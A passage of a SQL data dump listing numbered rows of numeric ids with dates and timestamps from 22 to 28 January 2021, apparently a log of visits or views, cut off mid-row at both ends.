23:18:18'),(11873,3060,1,'2021-01-22','2021-01-22 23:33:16'),(11874,3004,1,'2021-01-22','2021-01-22 23:41:48'),(11875,1588,1,'2021-01-23','2021-01-23 00:11:50'),(11876,2248,1,'2021-01-23','2021-01-23 00:26:51'),(11877,481,1,'2021-01-23','2021-01-23 02:20:03'),(11878,68,1,'2021-01-23','2021-01-23 02:32:23'),(11879,2159,1,'2021-01-23','2021-01-23 02:51:25'),(11880,91,1,'2021-01-23','2021-01-23 03:00:09'),(11881,1766,1,'2021-01-23','2021-01-23 04:11:35'),(11882,3006,1,'2021-01-23','2021-01-23 04:16:52'),(11883,3006,1,'2021-01-23','2021-01-23 04:17:02'),(11884,3127,1,'2021-01-23','2021-01-23 04:45:16'),(11885,3034,1,'2021-01-23','2021-01-23 04:49:20'),(11886,470,1,'2021-01-23','2021-01-23 05:11:51'),(11887,1582,1,'2021-01-23','2021-01-23 05:11:56'),(11888,467,1,'2021-01-23','2021-01-23 06:09:53'),(11889,2609,1,'2021-01-23','2021-01-23 06:49:59'),(11890,102,1,'2021-01-23','2021-01-23 06:51:15'),(11891,3005,1,'2021-01-23','2021-01-23 07:20:06'),(11892,2989,1,'2021-01-23','2021-01-23 07:50:22'),(11893,2161,1,'2021-01-23','2021-01-23 08:04:05'),(11894,1612,1,'2021-01-23','2021-01-23 08:40:46'),(11895,468,1,'2021-01-23','2021-01-23 09:00:07'),(11896,3056,1,'2021-01-23','2021-01-23 09:14:17'),(11897,1606,1,'2021-01-23','2021-01-23 09:41:19'),(11898,76,1,'2021-01-23','2021-01-23 10:12:39'),(11899,2503,1,'2021-01-23','2021-01-23 10:31:23'),(11900,108,1,'2021-01-23','2021-01-23 10:31:40'),(11901,2410,1,'2021-01-23','2021-01-23 11:11:45'),(11902,1720,1,'2021-01-23','2021-01-23 11:21:57'),(11903,2911,1,'2021-01-23','2021-01-23 11:39:54'),(11904,1598,1,'2021-01-23','2021-01-23 11:42:11'),(11905,1602,1,'2021-01-23','2021-01-23 12:02:29'),(11906,2775,1,'2021-01-23','2021-01-23 12:15:16'),(11907,1600,1,'2021-01-23','2021-01-23 12:32:32'),(11908,2309,1,'2021-01-23','2021-01-23 13:08:48'),(11909,3038,1,'2021-01-23','2021-01-23 13:11:13'),(11910,2309,1,'2021-01-23','2021-01-23 13:34:39'),(11911,1588,1,'2021-01-23','2021-01-23 13:44:01'),(11912,1608,1,'2021-01-23','2021-01-23 14:22:43'),(11913,2904,1,'2021-01-23','2021-01-23 14:25:47'),(11914,76,1,'2021-01-23','2021-01-23 14:52:53'),(11915,1598,1,'2021-01-23','2021-01-23 15:13:05'),(11916,1749,1,'2021-01-23','2021-01-23 15:28:31'),(11917,1709,1,'2021-01-23','2021-01-23 15:29:42'),(11918,91,1,'2021-01-23','2021-01-23 15:30:05'),(11919,2309,1,'2021-01-23','2021-01-23 16:03:05'),(11920,2309,1,'2021-01-23','2021-01-23 16:03:26'),(11921,3240,1,'2021-01-23','2021-01-23 16:04:55'),(11922,2309,1,'2021-01-23','2021-01-23 16:05:15'),(11923,1606,1,'2021-01-23','2021-01-23 16:27:34'),(11924,80,1,'2021-01-23','2021-01-23 16:28:00'),(11925,2609,1,'2021-01-23','2021-01-23 16:34:24'),(11926,2410,1,'2021-01-23','2021-01-23 16:54:20'),(11927,1701,1,'2021-01-23','2021-01-23 17:24:13'),(11928,3069,1,'2021-01-23','2021-01-23 17:57:17'),(11929,1604,1,'2021-01-23','2021-01-23 18:04:33'),(11930,468,1,'2021-01-23','2021-01-23 18:35:02'),(11931,1586,1,'2021-01-23','2021-01-23 18:42:00'),(11932,2617,1,'2021-01-23','2021-01-23 18:43:41'),(11933,1586,1,'2021-01-23','2021-01-23 18:44:16'),(11934,1596,1,'2021-01-23','2021-01-23 18:45:05'),(11935,1747,1,'2021-01-23','2021-01-23 18:55:00'),(11936,1586,1,'2021-01-23','2021-01-23 18:59:51'),(11937,80,1,'2021-01-23','2021-01-23 19:24:45'),(11938,1596,1,'2021-01-23','2021-01-23 19:34:35'),(11939,1592,1,'2021-01-23','2021-01-23 19:54:52'),(11940,1614,1,'2021-01-23','2021-01-23 19:57:06'),(11941,1612,1,'2021-01-23','2021-01-23 20:05:14'),(11942,1594,1,'2021-01-23','2021-01-23 20:24:28'),(11943,1614,1,'2021-01-23','2021-01-23 20:25:45'),(11944,1612,1,'2021-01-23','2021-01-23 20:30:47'),(11945,2503,1,'2021-01-23','2021-01-23 21:24:33'),(11946,1720,1,'2021-01-23','2021-01-23 21:34:20'),(11947,2609,1,'2021-01-23','2021-01-23 21:44:19'),(11948,3072,1,'2021-01-23','2021-01-23 21:54:27'),(11949,1600,1,'2021-01-23','2021-01-23 22:14:23'),(11950,3092,1,'2021-01-23','2021-01-23 22:47:07'),(11951,1596,1,'2021-01-23','2021-01-23 22:49:45'),(11952,1612,1,'2021-01-23','2021-01-23 22:50:09'),(11953,2617,1,'2021-01-23','2021-01-23 22:54:41'),(11954,72,1,'2021-01-23','2021-01-23 23:25:07'),(11955,1718,1,'2021-01-23','2021-01-23 23:45:02'),(11956,1718,1,'2021-01-24','2021-01-24 00:04:51'),(11957,1600,1,'2021-01-24','2021-01-24 00:09:17'),(11958,2813,1,'2021-01-24','2021-01-24 00:34:46'),(11959,2751,1,'2021-01-24','2021-01-24 00:44:31'),(11960,2159,1,'2021-01-24','2021-01-24 01:24:43'),(11961,1598,1,'2021-01-24','2021-01-24 02:45:15'),(11962,1604,1,'2021-01-24','2021-01-24 02:55:19'),(11963,1768,1,'2021-01-24','2021-01-24 03:05:21'),(11964,76,1,'2021-01-24','2021-01-24 03:25:21'),(11965,3280,1,'2021-01-24','2021-01-24 03:35:32'),(11966,1594,1,'2021-01-24','2021-01-24 03:45:31'),(11967,1582,1,'2021-01-24','2021-01-24 04:12:43'),(11968,3127,1,'2021-01-24','2021-01-24 04:15:28'),(11969,2296,1,'2021-01-24','2021-01-24 04:35:33'),(11970,76,1,'2021-01-24','2021-01-24 05:00:28'),(11971,76,1,'2021-01-24','2021-01-24 05:01:13'),(11972,1592,1,'2021-01-24','2021-01-24 05:45:35'),(11973,1598,1,'2021-01-24','2021-01-24 06:05:32'),(11974,74,1,'2021-01-24','2021-01-24 06:35:32'),(11975,1582,1,'2021-01-24','2021-01-24 07:56:13'),(11976,2609,1,'2021-01-24','2021-01-24 08:16:36'),(11977,2971,1,'2021-01-24','2021-01-24 08:26:20'),(11978,1584,1,'2021-01-24','2021-01-24 08:46:30'),(11979,2769,1,'2021-01-24','2021-01-24 09:57:20'),(11980,2457,1,'2021-01-24','2021-01-24 10:27:15'),(11981,1614,1,'2021-01-24','2021-01-24 10:57:12'),(11982,1778,1,'2021-01-24','2021-01-24 11:29:34'),(11983,89,1,'2021-01-24','2021-01-24 12:37:35'),(11984,1582,1,'2021-01-24','2021-01-24 12:37:39'),(11985,68,1,'2021-01-24','2021-01-24 12:38:07'),(11986,89,1,'2021-01-24','2021-01-24 12:40:59'),(11987,68,1,'2021-01-24','2021-01-24 12:41:19'),(11988,1600,1,'2021-01-24','2021-01-24 13:28:01'),(11989,1705,1,'2021-01-24','2021-01-24 13:38:13'),(11990,3175,1,'2021-01-24','2021-01-24 14:08:34'),(11991,3316,1,'2021-01-24','2021-01-24 14:18:36'),(11992,1737,1,'2021-01-24','2021-01-24 14:28:31'),(11993,1695,1,'2021-01-24','2021-01-24 14:37:19'),(11994,2704,1,'2021-01-24','2021-01-24 14:48:30'),(11995,2309,1,'2021-01-24','2021-01-24 15:19:04'),(11996,1544,1,'2021-01-24','2021-01-24 15:19:05'),(11997,467,1,'2021-01-24','2021-01-24 15:46:14'),(11998,570,1,'2021-01-24','2021-01-24 15:49:07'),(11999,1600,1,'2021-01-24','2021-01-24 15:51:03'),(12000,472,1,'2021-01-24','2021-01-24 16:29:17'),(12001,3030,1,'2021-01-24','2021-01-24 16:51:12'),(12002,91,1,'2021-01-24','2021-01-24 17:49:15'),(12003,1598,1,'2021-01-24','2021-01-24 17:51:38'),(12004,1598,1,'2021-01-24','2021-01-24 17:58:46'),(12005,1598,1,'2021-01-24','2021-01-24 17:59:10'),(12006,2557,1,'2021-01-24','2021-01-24 17:59:21'),(12007,1612,1,'2021-01-24','2021-01-24 18:09:32'),(12008,108,1,'2021-01-24','2021-01-24 18:09:35'),(12009,84,1,'2021-01-24','2021-01-24 18:19:36'),(12010,87,1,'2021-01-24','2021-01-24 18:19:40'),(12011,1614,1,'2021-01-24','2021-01-24 18:39:22'),(12012,2609,1,'2021-01-24','2021-01-24 19:19:40'),(12013,3038,1,'2021-01-24','2021-01-24 19:49:42'),(12014,2309,1,'2021-01-24','2021-01-24 20:05:46'),(12015,2457,1,'2021-01-24','2021-01-24 20:09:52'),(12016,1614,1,'2021-01-24','2021-01-24 20:30:03'),(12017,1544,1,'2021-01-24','2021-01-24 20:51:49'),(12018,2159,1,'2021-01-24','2021-01-24 20:59:58'),(12019,1588,1,'2021-01-24','2021-01-24 21:10:01'),(12020,2769,1,'2021-01-24','2021-01-24 21:40:24'),(12021,1602,1,'2021-01-24','2021-01-24 22:30:15'),(12022,1604,1,'2021-01-24','2021-01-24 23:10:15'),(12023,3006,1,'2021-01-25','2021-01-25 00:10:55'),(12024,2309,1,'2021-01-25','2021-01-25 01:00:43'),(12025,2751,1,'2021-01-25','2021-01-25 01:11:19'),(12026,1718,1,'2021-01-25','2021-01-25 01:31:10'),(12027,3282,1,'2021-01-25','2021-01-25 01:36:51'),(12028,1612,1,'2021-01-25','2021-01-25 01:41:34'),(12029,1608,1,'2021-01-25','2021-01-25 02:36:52'),(12030,2410,1,'2021-01-25','2021-01-25 02:42:11'),(12031,76,1,'2021-01-25','2021-01-25 03:12:04'),(12032,2904,1,'2021-01-25','2021-01-25 03:42:33'),(12033,570,1,'2021-01-25','2021-01-25 03:52:32'),(12034,108,1,'2021-01-25','2021-01-25 04:02:31'),(12035,3066,1,'2021-01-25','2021-01-25 04:02:33'),(12036,2964,1,'2021-01-25','2021-01-25 04:12:44'),(12037,2609,1,'2021-01-25','2021-01-25 05:32:51'),(12038,80,1,'2021-01-25','2021-01-25 06:03:27'),(12039,80,1,'2021-01-25','2021-01-25 06:03:33'),(12040,3107,1,'2021-01-25','2021-01-25 06:29:24'),(12041,3107,1,'2021-01-25','2021-01-25 06:33:30'),(12042,2769,1,'2021-01-25','2021-01-25 06:33:38'),(12043,3038,1,'2021-01-25','2021-01-25 06:43:22'),(12044,2457,1,'2021-01-25','2021-01-25 06:53:31'),(12045,2558,1,'2021-01-25','2021-01-25 07:33:37'),(12046,1544,1,'2021-01-25','2021-01-25 07:41:45'),(12047,3063,1,'2021-01-25','2021-01-25 07:56:19'),(12048,1596,1,'2021-01-25','2021-01-25 08:13:32'),(12049,1586,1,'2021-01-25','2021-01-25 09:44:52'),(12050,76,1,'2021-01-25','2021-01-25 10:40:15'),(12051,2309,1,'2021-01-25','2021-01-25 10:43:37'),(12052,1739,1,'2021-01-25','2021-01-25 10:44:51'),(12053,2309,1,'2021-01-25','2021-01-25 11:12:05'),(12054,3181,1,'2021-01-25','2021-01-25 11:15:16'),(12055,1600,1,'2021-01-25','2021-01-25 11:15:39'),(12056,1745,1,'2021-01-25','2021-01-25 11:16:15'),(12057,1600,1,'2021-01-25','2021-01-25 11:16:27'),(12058,2309,1,'2021-01-25','2021-01-25 11:18:36'),(12059,2309,1,'2021-01-25','2021-01-25 11:18:59'),(12060,1600,1,'2021-01-25','2021-01-25 11:21:41'),(12061,1770,1,'2021-01-25','2021-01-25 11:25:51'),(12062,1770,1,'2021-01-25','2021-01-25 11:25:53'),(12063,80,1,'2021-01-25','2021-01-25 11:26:58'),(12064,80,1,'2021-01-25','2021-01-25 11:26:59'),(12065,1600,1,'2021-01-25','2021-01-25 11:41:59'),(12066,2410,1,'2021-01-25','2021-01-25 11:43:31'),(12067,1745,1,'2021-01-25','2021-01-25 11:44:02'),(12068,80,1,'2021-01-25','2021-01-25 11:45:37'),(12069,3087,1,'2021-01-25','2021-01-25 11:45:44'),(12070,335,1,'2021-01-25','2021-01-25 11:55:41'),(12071,89,1,'2021-01-25','2021-01-25 11:55:43'),(12072,1768,1,'2021-01-25','2021-01-25 12:05:08'),(12073,2309,1,'2021-01-25','2021-01-25 12:11:09'),(12074,2309,1,'2021-01-25','2021-01-25 12:11:13'),(12075,89,1,'2021-01-25','2021-01-25 12:24:38'),(12076,2457,1,'2021-01-25','2021-01-25 12:49:47'),(12077,2457,1,'2021-01-25','2021-01-25 12:50:13'),(12078,2457,1,'2021-01-25','2021-01-25 13:01:25'),(12079,2457,1,'2021-01-25','2021-01-25 13:02:57'),(12080,89,1,'2021-01-25','2021-01-25 13:10:21'),(12081,1715,1,'2021-01-25','2021-01-25 13:11:39'),(12082,3285,1,'2021-01-25','2021-01-25 13:16:13'),(12083,89,1,'2021-01-25','2021-01-25 13:56:16'),(12084,3287,1,'2021-01-25','2021-01-25 13:56:24'),(12085,3282,1,'2021-01-25','2021-01-25 13:57:12'),(12086,3280,1,'2021-01-25','2021-01-25 14:00:25'),(12087,89,1,'2021-01-25','2021-01-25 14:03:08'),(12088,3056,1,'2021-01-25','2021-01-25 14:24:59'),(12089,1598,1,'2021-01-25','2021-01-25 15:10:35'),(12090,3430,1,'2021-01-25','2021-01-25 15:14:09'),(12091,91,1,'2021-01-25','2021-01-25 15:17:44'),(12092,2297,1,'2021-01-25','2021-01-25 15:20:19'),(12093,3280,1,'2021-01-25','2021-01-25 15:37:07'),(12094,91,1,'2021-01-25','2021-01-25 15:56:14'),(12095,470,1,'2021-01-25','2021-01-25 16:11:13'),(12096,1588,1,'2021-01-25','2021-01-25 16:27:37'),(12097,3430,1,'2021-01-25','2021-01-25 16:40:04'),(12098,1582,1,'2021-01-25','2021-01-25 16:57:17'),(12099,2420,1,'2021-01-25','2021-01-25 17:12:04'),(12100,91,1,'2021-01-25','2021-01-25 17:32:03'),(12101,2804,1,'2021-01-25','2021-01-25 18:03:23'),(12102,3178,1,'2021-01-25','2021-01-25 18:06:45'),(12103,1544,1,'2021-01-25','2021-01-25 18:16:31'),(12104,2178,1,'2021-01-25','2021-01-25 18:37:01'),(12105,1592,1,'2021-01-25','2021-01-25 18:48:09'),(12106,1582,1,'2021-01-25','2021-01-25 19:02:12'),(12107,1592,1,'2021-01-25','2021-01-25 19:10:30'),(12108,1582,1,'2021-01-25','2021-01-25 19:38:57'),(12109,1594,1,'2021-01-25','2021-01-25 20:19:20'),(12110,3282,1,'2021-01-25','2021-01-25 20:36:08'),(12111,2809,1,'2021-01-25','2021-01-25 20:39:26'),(12112,1747,1,'2021-01-25','2021-01-25 20:59:33'),(12113,1699,1,'2021-01-25','2021-01-25 21:21:56'),(12114,1730,1,'2021-01-25','2021-01-25 21:49:39'),(12115,1608,1,'2021-01-25','2021-01-25 22:05:39'),(12116,1598,1,'2021-01-25','2021-01-25 22:06:33'),(12117,2309,1,'2021-01-25','2021-01-25 22:13:59'),(12118,2309,1,'2021-01-25','2021-01-25 22:15:43'),(12119,1582,1,'2021-01-25','2021-01-25 22:32:19'),(12120,2159,1,'2021-01-25','2021-01-25 23:00:23'),(12121,1600,1,'2021-01-25','2021-01-25 23:10:38'),(12122,1766,1,'2021-01-25','2021-01-25 23:30:57'),(12123,1586,1,'2021-01-26','2021-01-26 01:02:09'),(12124,3430,1,'2021-01-26','2021-01-26 02:08:35'),(12125,84,1,'2021-01-26','2021-01-26 02:10:38'),(12126,87,1,'2021-01-26','2021-01-26 02:10:54'),(12127,89,1,'2021-01-26','2021-01-26 02:10:56'),(12128,91,1,'2021-01-26','2021-01-26 02:10:59'),(12129,87,1,'2021-01-26','2021-01-26 03:23:31'),(12130,2503,1,'2021-01-26','2021-01-26 03:54:09'),(12131,1614,1,'2021-01-26','2021-01-26 04:27:07'),(12132,1592,1,'2021-01-26','2021-01-26 04:44:28'),(12133,3034,1,'2021-01-26','2021-01-26 04:54:15'),(12134,2609,1,'2021-01-26','2021-01-26 06:04:28'),(12135,1720,1,'2021-01-26','2021-01-26 06:55:04'),(12136,3069,1,'2021-01-26','2021-01-26 07:07:30'),(12137,3069,1,'2021-01-26','2021-01-26 07:15:49'),(12138,91,1,'2021-01-26','2021-01-26 07:45:25'),(12139,1582,1,'2021-01-26','2021-01-26 08:05:45'),(12140,2813,1,'2021-01-26','2021-01-26 08:17:44'),(12141,2617,1,'2021-01-26','2021-01-26 09:16:49'),(12142,3316,1,'2021-01-26','2021-01-26 09:32:06'),(12143,3263,1,'2021-01-26','2021-01-26 09:37:10'),(12144,91,1,'2021-01-26','2021-01-26 09:43:19'),(12145,1586,1,'2021-01-26','2021-01-26 09:47:15'),(12146,1586,1,'2021-01-26','2021-01-26 09:51:56'),(12147,1586,1,'2021-01-26','2021-01-26 09:57:28'),(12148,2309,1,'2021-01-26','2021-01-26 10:30:04'),(12149,1600,1,'2021-01-26','2021-01-26 10:34:19'),(12150,84,1,'2021-01-26','2021-01-26 10:35:22'),(12151,68,1,'2021-01-26','2021-01-26 10:35:27'),(12152,80,1,'2021-01-26','2021-01-26 10:35:45'),(12153,68,1,'2021-01-26','2021-01-26 10:37:11'),(12154,84,1,'2021-01-26','2021-01-26 10:37:18'),(12155,1600,1,'2021-01-26','2021-01-26 10:37:25'),(12156,3181,1,'2021-01-26','2021-01-26 11:17:28'),(12157,1606,1,'2021-01-26','2021-01-26 11:57:26'),(12158,3104,1,'2021-01-26','2021-01-26 12:19:12'),(12159,2159,1,'2021-01-26','2021-01-26 12:23:59'),(12160,1614,1,'2021-01-26','2021-01-26 12:36:10'),(12161,80,1,'2021-01-26','2021-01-26 12:37:24'),(12162,2159,1,'2021-01-26','2021-01-26 12:48:22'),(12163,1602,1,'2021-01-26','2021-01-26 13:04:03'),(12164,1614,1,'2021-01-26','2021-01-26 13:07:38'),(12165,1606,1,'2021-01-26','2021-01-26 13:20:57'),(12166,1600,1,'2021-01-26','2021-01-26 13:20:59'),(12167,91,1,'2021-01-26','2021-01-26 13:22:35'),(12168,76,1,'2021-01-26','2021-01-26 13:27:49'),(12169,3430,1,'2021-01-26','2021-01-26 13:32:13'),(12170,2557,1,'2021-01-26','2021-01-26 13:38:17'),(12171,2159,1,'2021-01-26','2021-01-26 13:39:07'),(12172,1600,1,'2021-01-26','2021-01-26 14:16:37'),(12173,1600,1,'2021-01-26','2021-01-26 14:17:26'),(12174,1586,1,'2021-01-26','2021-01-26 14:18:36'),(12175,2410,1,'2021-01-26','2021-01-26 14:21:32'),(12176,80,1,'2021-01-26','2021-01-26 14:46:41'),(12177,2309,1,'2021-01-26','2021-01-26 14:53:25'),(12178,1586,1,'2021-01-26','2021-01-26 14:54:02'),(12179,1604,1,'2021-01-26','2021-01-26 14:54:16'),(12180,1586,1,'2021-01-26','2021-01-26 14:59:52'),(12181,80,1,'2021-01-26','2021-01-26 15:02:09'),(12182,1586,1,'2021-01-26','2021-01-26 15:02:24'),(12183,1600,1,'2021-01-26','2021-01-26 15:09:55'),(12184,1600,1,'2021-01-26','2021-01-26 15:13:28'),(12185,91,1,'2021-01-26','2021-01-26 15:20:17'),(12186,1600,1,'2021-01-26','2021-01-26 15:20:28'),(12187,1715,1,'2021-01-26','2021-01-26 15:20:58'),(12188,91,1,'2021-01-26','2021-01-26 15:21:50'),(12189,1730,1,'2021-01-26','2021-01-26 15:23:59'),(12190,91,1,'2021-01-26','2021-01-26 15:24:41'),(12191,1600,1,'2021-01-26','2021-01-26 15:26:31'),(12192,1766,1,'2021-01-26','2021-01-26 15:28:30'),(12193,1604,1,'2021-01-26','2021-01-26 15:37:44'),(12194,3005,1,'2021-01-26','2021-01-26 15:37:59'),(12195,3307,1,'2021-01-26','2021-01-26 15:42:14'),(12196,3313,1,'2021-01-26','2021-01-26 15:43:34'),(12197,91,1,'2021-01-26','2021-01-26 15:45:12'),(12198,91,1,'2021-01-26','2021-01-26 15:46:08'),(12199,3034,1,'2021-01-26','2021-01-26 15:54:23'),(12200,72,1,'2021-01-26','2021-01-26 15:55:05'),(12201,1780,1,'2021-01-26','2021-01-26 16:05:02'),(12202,2309,1,'2021-01-26','2021-01-26 16:10:37'),(12203,2309,1,'2021-01-26','2021-01-26 16:12:32'),(12204,2309,1,'2021-01-26','2021-01-26 16:13:10'),(12205,2309,1,'2021-01-26','2021-01-26 16:14:04'),(12206,2156,1,'2021-01-26','2021-01-26 16:23:05'),(12207,91,1,'2021-01-26','2021-01-26 17:01:17'),(12208,91,1,'2021-01-26','2021-01-26 17:01:47'),(12209,2159,1,'2021-01-26','2021-01-26 17:05:39'),(12210,91,1,'2021-01-26','2021-01-26 17:06:35'),(12211,91,1,'2021-01-26','2021-01-26 17:07:45'),(12212,89,1,'2021-01-26','2021-01-26 17:08:35'),(12213,76,1,'2021-01-26','2021-01-26 17:09:25'),(12214,68,1,'2021-01-26','2021-01-26 17:11:12'),(12215,1594,1,'2021-01-26','2021-01-26 18:02:08'),(12216,1594,1,'2021-01-26','2021-01-26 18:02:14'),(12217,1594,1,'2021-01-26','2021-01-26 18:02:14'),(12218,1594,1,'2021-01-26','2021-01-26 18:02:15'),(12219,80,1,'2021-01-26','2021-01-26 18:04:02'),(12220,80,1,'2021-01-26','2021-01-26 18:04:03'),(12221,87,1,'2021-01-26','2021-01-26 18:18:59'),(12222,2775,1,'2021-01-26','2021-01-26 18:26:21'),(12223,84,1,'2021-01-26','2021-01-26 18:29:10'),(12224,1600,1,'2021-01-26','2021-01-26 18:34:08'),(12225,570,1,'2021-01-26','2021-01-26 18:34:26'),(12226,570,1,'2021-01-26','2021-01-26 18:34:38'),(12227,1600,1,'2021-01-26','2021-01-26 18:34:46'),(12228,3127,1,'2021-01-26','2021-01-26 18:55:21'),(12229,91,1,'2021-01-26','2021-01-26 18:59:14'),(12230,1544,1,'2021-01-26','2021-01-26 19:09:10'),(12231,3265,1,'2021-01-26','2021-01-26 19:11:09'),(12232,570,1,'2021-01-26','2021-01-26 19:15:23'),(12233,570,1,'2021-01-26','2021-01-26 19:17:00'),(12234,3307,1,'2021-01-26','2021-01-26 19:23:18'),(12235,3072,1,'2021-01-26','2021-01-26 19:34:33'),(12236,1598,1,'2021-01-26','2021-01-26 19:35:30'),(12237,1596,1,'2021-01-26','2021-01-26 19:49:16'),(12238,91,1,'2021-01-26','2021-01-26 20:02:14'),(12239,1582,1,'2021-01-26','2021-01-26 20:10:23'),(12240,1598,1,'2021-01-26','2021-01-26 20:29:31'),(12241,1598,1,'2021-01-26','2021-01-26 20:29:50'),(12242,1582,1,'2021-01-26','2021-01-26 20:41:26'),(12243,1582,1,'2021-01-26','2021-01-26 20:41:27'),(12244,3107,1,'2021-01-26','2021-01-26 20:49:16'),(12245,2309,1,'2021-01-26','2021-01-26 21:01:40'),(12246,2309,1,'2021-01-26','2021-01-26 21:58:06'),(12247,2751,1,'2021-01-26','2021-01-26 22:13:41'),(12248,1586,1,'2021-01-26','2021-01-26 22:30:31'),(12249,1720,1,'2021-01-26','2021-01-26 22:40:42'),(12250,1608,1,'2021-01-26','2021-01-26 22:57:26'),(12251,1705,1,'2021-01-26','2021-01-26 22:57:51'),(12252,1606,1,'2021-01-26','2021-01-26 23:20:26'),(12253,1600,1,'2021-01-26','2021-01-26 23:50:35'),(12254,91,1,'2021-01-27','2021-01-27 00:11:48'),(12255,2457,1,'2021-01-27','2021-01-27 00:30:38'),(12256,2293,1,'2021-01-27','2021-01-27 00:41:04'),(12257,80,1,'2021-01-27','2021-01-27 01:00:49'),(12258,76,1,'2021-01-27','2021-01-27 01:11:07'),(12259,1598,1,'2021-01-27','2021-01-27 01:51:45'),(12260,76,1,'2021-01-27','2021-01-27 01:52:57'),(12261,76,1,'2021-01-27','2021-01-27 01:57:51'),(12262,1747,1,'2021-01-27','2021-01-27 02:19:36'),(12263,3027,1,'2021-01-27','2021-01-27 02:41:50'),(12264,1718,1,'2021-01-27','2021-01-27 02:47:24'),(12265,467,1,'2021-01-27','2021-01-27 03:02:14'),(12266,72,1,'2021-01-27','2021-01-27 04:11:48'),(12267,72,1,'2021-01-27','2021-01-27 04:21:53'),(12268,3083,1,'2021-01-27','2021-01-27 04:32:13'),(12269,1596,1,'2021-01-27','2021-01-27 05:42:11'),(12270,1608,1,'2021-01-27','2021-01-27 06:08:51'),(12271,1608,1,'2021-01-27','2021-01-27 06:08:56'),(12272,1604,1,'2021-01-27','2021-01-27 06:14:56'),(12273,1604,1,'2021-01-27','2021-01-27 07:12:42'),(12274,3087,1,'2021-01-27','2021-01-27 08:36:31'),(12275,1600,1,'2021-01-27','2021-01-27 10:08:17'),(12276,72,1,'2021-01-27','2021-01-27 10:41:56'),(12277,1604,1,'2021-01-27','2021-01-27 11:25:14'),(12278,2503,1,'2021-01-27','2021-01-27 11:25:17'),(12279,1600,1,'2021-01-27','2021-01-27 11:35:24'),(12280,108,1,'2021-01-27','2021-01-27 11:35:38'),(12281,2769,1,'2021-01-27','2021-01-27 12:14:31'),(12282,1720,1,'2021-01-27','2021-01-27 12:15:14'),(12283,1582,1,'2021-01-27','2021-01-27 12:26:11'),(12284,1598,1,'2021-01-27','2021-01-27 12:35:19'),(12285,87,1,'2021-01-27','2021-01-27 12:45:47'),(12286,2457,1,'2021-01-27','2021-01-27 13:05:50'),(12287,1606,1,'2021-01-27','2021-01-27 13:09:43'),(12288,3079,1,'2021-01-27','2021-01-27 13:29:53'),(12289,1602,1,'2021-01-27','2021-01-27 13:56:26'),(12290,1766,1,'2021-01-27','2021-01-27 14:14:54'),(12291,80,1,'2021-01-27','2021-01-27 14:16:24'),(12292,1608,1,'2021-01-27','2021-01-27 14:35:53'),(12293,1705,1,'2021-01-27','2021-01-27 15:06:46'),(12294,1586,1,'2021-01-27','2021-01-27 15:10:58'),(12295,2159,1,'2021-01-27','2021-01-27 15:11:33'),(12296,1600,1,'2021-01-27','2021-01-27 15:27:01'),(12297,3006,1,'2021-01-27','2021-01-27 15:57:23'),(12298,2309,1,'2021-01-27','2021-01-27 15:57:51'),(12299,2309,1,'2021-01-27','2021-01-27 15:58:20'),(12300,2296,1,'2021-01-27','2021-01-27 16:07:13'),(12301,468,1,'2021-01-27','2021-01-27 16:47:17'),(12302,468,1,'2021-01-27','2021-01-27 16:57:23'),(12303,1592,1,'2021-01-27','2021-01-27 17:02:17'),(12304,1774,1,'2021-01-27','2021-01-27 17:05:25'),(12305,1608,1,'2021-01-27','2021-01-27 17:27:50'),(12306,76,1,'2021-01-27','2021-01-27 17:27:51'),(12307,1608,1,'2021-01-27','2021-01-27 17:28:26'),(12308,1608,1,'2021-01-27','2021-01-27 17:29:08'),(12309,1596,1,'2021-01-27','2021-01-27 17:35:21'),(12310,76,1,'2021-01-27','2021-01-27 17:37:21'),(12311,76,1,'2021-01-27','2021-01-27 17:37:41'),(12312,1592,1,'2021-01-27','2021-01-27 17:37:42'),(12313,1596,1,'2021-01-27','2021-01-27 17:37:45'),(12314,1608,1,'2021-01-27','2021-01-27 17:44:46'),(12315,72,1,'2021-01-27','2021-01-27 17:47:54'),(12316,2904,1,'2021-01-27','2021-01-27 17:58:13'),(12317,1600,1,'2021-01-27','2021-01-27 17:59:18'),(12318,3240,1,'2021-01-27','2021-01-27 18:12:38'),(12319,2769,1,'2021-01-27','2021-01-27 18:36:03'),(12320,2309,1,'2021-01-27','2021-01-27 19:07:57'),(12321,1604,1,'2021-01-27','2021-01-27 20:31:14'),(12322,1588,1,'2021-01-27','2021-01-27 20:38:37'),(12323,1604,1,'2021-01-27','2021-01-27 21:20:27'),(12324,89,1,'2021-01-27','2021-01-27 21:29:30'),(12325,474,1,'2021-01-27','2021-01-27 21:33:52'),(12326,84,1,'2021-01-27','2021-01-27 21:34:57'),(12327,91,1,'2021-01-27','2021-01-27 21:38:44'),(12328,2809,1,'2021-01-27','2021-01-27 21:55:50'),(12329,1592,1,'2021-01-27','2021-01-27 22:06:43'),(12330,2617,1,'2021-01-27','2021-01-27 22:20:31'),(12331,2159,1,'2021-01-27','2021-01-27 22:39:12'),(12332,2159,1,'2021-01-27','2021-01-27 22:41:44'),(12333,2971,1,'2021-01-27','2021-01-27 22:42:33'),(12334,2159,1,'2021-01-27','2021-01-27 22:53:11'),(12335,2159,1,'2021-01-27','2021-01-27 22:53:28'),(12336,2309,1,'2021-01-27','2021-01-27 23:04:44'),(12337,2309,1,'2021-01-27','2021-01-27 23:04:52'),(12338,3316,1,'2021-01-28','2021-01-28 00:12:00'),(12339,1606,1,'2021-01-28','2021-01-28 00:19:52'),(12340,2769,1,'2021-01-28','2021-01-28 00:37:48'),(12341,1588,1,'2021-01-28','2021-01-28 00:39:37'),(12342,1598,1,'2021-01-28','2021-01-28 00:54:55'),(12343,2309,1,'2021-01-28','2021-01-28 01:20:20'),(12344,1596,1,'2021-01-28','2021-01-28 01:50:24'),(12345,68,1,'2021-01-28','2021-01-28 01:51:09'),(12346,1713,1,'2021-01-28','2021-01-28 01:54:33'),(12347,2911,1,'2021-01-28','2021-01-28 02:16:16'),(12348,2989,1,'2021-01-28','2021-01-28 02:30:39'),(12349,3023,1,'2021-01-28','2021-01-28 03:33:22'),(12350,72,1,'2021-01-28','2021-01-28 04:09:38'),(12351,1730,1,'2021-01-28','2021-01-28 04:26:18'),(12352,3045,1,'2021-01-28','2021-01-28 04:37:50'),(12353,478,1,'2021-01-28','2021-01-28 04:39:35'),(12354,2801,1,'2021-01-28','2021-01-28 04:49:25'),(12355,80,1,'2021-01-28','2021-01-28 04:58:01'),(12356,1602,1,'2021-01-28','2021-01-28 05:22:59'),(12357,2410,1,'2021-01-28','2021-01-28 05:40:26'),(12358,2751,1,'2021-01-28','2021-01-28 05:46:56'),(12359,2309,1,'2021-01-28','2021-01-28 